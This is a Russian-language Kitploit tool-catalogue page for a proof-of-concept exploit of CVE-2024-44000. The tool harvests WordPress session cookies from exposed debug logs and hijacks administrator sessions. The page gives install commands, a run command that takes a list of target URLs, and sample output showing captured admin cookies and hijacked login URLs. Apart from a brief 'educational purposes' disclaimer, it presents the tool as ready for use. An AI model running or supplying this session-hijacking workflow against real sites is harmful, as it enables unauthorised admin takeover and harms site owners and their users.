Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-44000 — это PoC-инструмент, предназначенный для эксплуатации небезопасно раскрытых отладочных журналов сайтов WordPress и извлечения файлов cookie сеансов | Kitploit
Инструменты/GitHubGitHub/geniuszly/cve-2024-44000
ЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеRed Teaming
GitHubgeniuszly/cve-2024-44000

CVE-2024-44000

это PoC-инструмент, предназначенный для эксплуатации небезопасно раскрытых отладочных журналов сайтов WordPress и извлечения файлов cookie сеансов

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GenCookieSessionHijack — это PoC-инструмент, предназначенный для эксплуатации небезопасно раскрытых отладочных журналов сайтов WordPress и извлечения сессионных cookies. Это позволяет злоумышленнику перехватывать активные сеансы администратора и получать несанкционированный доступ к панели администратора WordPress.

Особенности

  • Извлечение cookies из отладочных журналов WordPress.
  • Идентификация и фильтрация сессионных cookies (например, wordpress_logged_in).
  • Автоматическая попытка захвата сеанса для доступа администратора.
  • Открытие захваченного сеанса администратора непосредственно в браузере.

Использование

Установка

root@kitploit:~
git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt

Запуск программы

  1. Подготовьте файл со списком целевых URL WordPress, по одному на строку (например, list.txt).
  2. Запустите программу следующей командой:
root@kitploit:~
python GenCookieSessionHijack.py -f list.txt -o result.txt

Параметры

  • -f, --file: Путь к файлу со списком URL (по умолчанию: list.txt).
  • -o, --output: Файл для сохранения результатов (по умолчанию: result.txt).

Пример

root@kitploit:~
python GenCookieSessionHijack.py -f targets.txt -o output.txt

Это прочитает список URL из targets.txt, попытается извлечь и использовать сессионные cookies, и сохранит результаты в output.txt.

Результаты

Если попытка захвата сеанса успешна, инструмент сгенерирует URL с захваченным сессионным cookie администратора и откроет его непосредственно в браузере.

Пример вывода:

root@kitploit:~
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
    wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456

[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie

[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404

Отказ от ответственности

Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться для незаконных действий. Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный этим инструментом.

Скачать инструмент